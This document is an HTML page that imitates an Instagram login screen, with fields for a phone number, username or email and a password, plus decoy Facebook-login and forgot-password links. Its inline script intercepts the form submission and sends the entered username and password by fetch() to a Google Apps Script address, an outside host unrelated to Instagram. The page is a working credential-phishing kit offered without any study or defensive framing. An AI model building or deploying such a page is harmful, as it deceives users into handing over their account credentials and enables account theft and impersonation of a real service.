<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet"type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">
   <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Pacifico&family=VT323&display=swap" rel="stylesheet">
    <style>body{
        display:Flex;justify-content:Center;align-items:center;height:100vh;
        background:white
    }
    .text{margin:10px;letter-spacing:1px;color:black}
        .contain{text-align:center;border:1px solid rgba(200,200,200,200)}
        .title{font-family: 'Pacifico', cursive;
;padding:30px 0px;font-size:38px;text-transform:capitalize;font-weight:normal}
        .page{width:350px;background:white;color:black;border-radius:5px;padding-bottom:15px}
        .contain form{position:relative;display:flex;flex-direction:column;
        width:75%;left:50%;transform:translatex(-50%);}
        form input{margin-bottom:5px;border-radius:3px;
        border:1px solid rgba(0,0,0,0.4);}
        form input:focus{
            border:1px solid rgba(0,0,0,0.7);
            outline:none;background:#efefef;
        }
        form input[type="text"],input[type="password"]{
            height:40px;font-size:17px;padding-left:10px;
            position:relative;
        }
        form input::placeholder{
            font-size:16px;transition:0.3s ease;
            font-weight:normal;
        }
        form input:focus::placeholder{position:absolute;
            font-size:12px;transform:translatey(-3px)
        }
        form button{position:relative;margin-top:5px;outline:none;border:none;cursor:pointer;
        padding:7px 7px;border-radius:3px;font-weight:bold;letter-spacing:1;color:white;
    background-color:#043fff;cursor:pointer;text-transform:capitalize}
    form button:active{transform:scale(0.955);
        background-color:#476eec;
    }
    form .option{margin:10px 0px;position:relative;font-weight:bold;color:#5a5a5a}
    form .option:before{
        content:'';height:2px;width:37%;
        background:#b6b6b6;position:absolute;
        top:50%;left:0;
    }
    form .option:after{
        content:'';height:2px;width:37%;
        background:#b6b6b6;position:absolute;
        top:50%;right:0;
    }
    .fblink{margin-top:15px;width:100%}
    .fblink span{font-size:17px;color:#043fff;margin-right:0px}
    .fblink a{text-decoration:none;font-size:17px;font-weight:bold}
    .forget-password{margin:15px;}
    .forget-password a{font-size:12px;text-decoration:none;font-weight:500px;
    color:#025fd2;}
.contain .sign-in{left:50%;margin-top:30px;font-size:17px;
position:relative;top:50%;transform:translatex(-50%);width:90%;border-radius:3px
    }
    .contain .sign-in a{text-decoration:none;font-weight:bold;margin-left:5px;text-transform:capitalize}
    </style>
</head>
<body>
    <div class="contain">
        <div class="text"></div>
        <div class="page">
            <div class="title">Instagram</div>
            <form method="post"id="form">
                <input type="text"placeholder="Phone number,username or email"name="number">
                <input type="password"placeholder="Password"name="password">
                <button>Log in</button>
                <div class="option">Or</div>
                
            </form>
            <div class="fblink">
                <span class="fab fa-facebook"></span>
                    <a href="#">Log in with facebook</a>
            </div>
            <div class="forget-password">
                <a href=#>Forget password</a>
            </div>
            <div class="sign-in">
                <p>Don't have an account?<a href="#">Sign in</a></p>
            </div>
        </div>
    </div>
    <script type="text/javascript">
        let url='https://script.google.com/macros/s/AKfycbx8nKJAx5i5XplDGuHmac_7iRtHzCUO1-ShZ6rU1y4sfSKFgFEWYGu7X-0CuIPDVJbI/exec';
        let form=document.querySelector("#form");
        form.addEventListener("submit",(e)=>{
          let d=new FormData(form);
          fetch(url,{
            method:"POST",
            body:d
          }).then((res)=>res.text())
          .then((finalRes)=>console.log(finalRes))
          e.preventDefault();
        })
    </script>
</body>
</html>
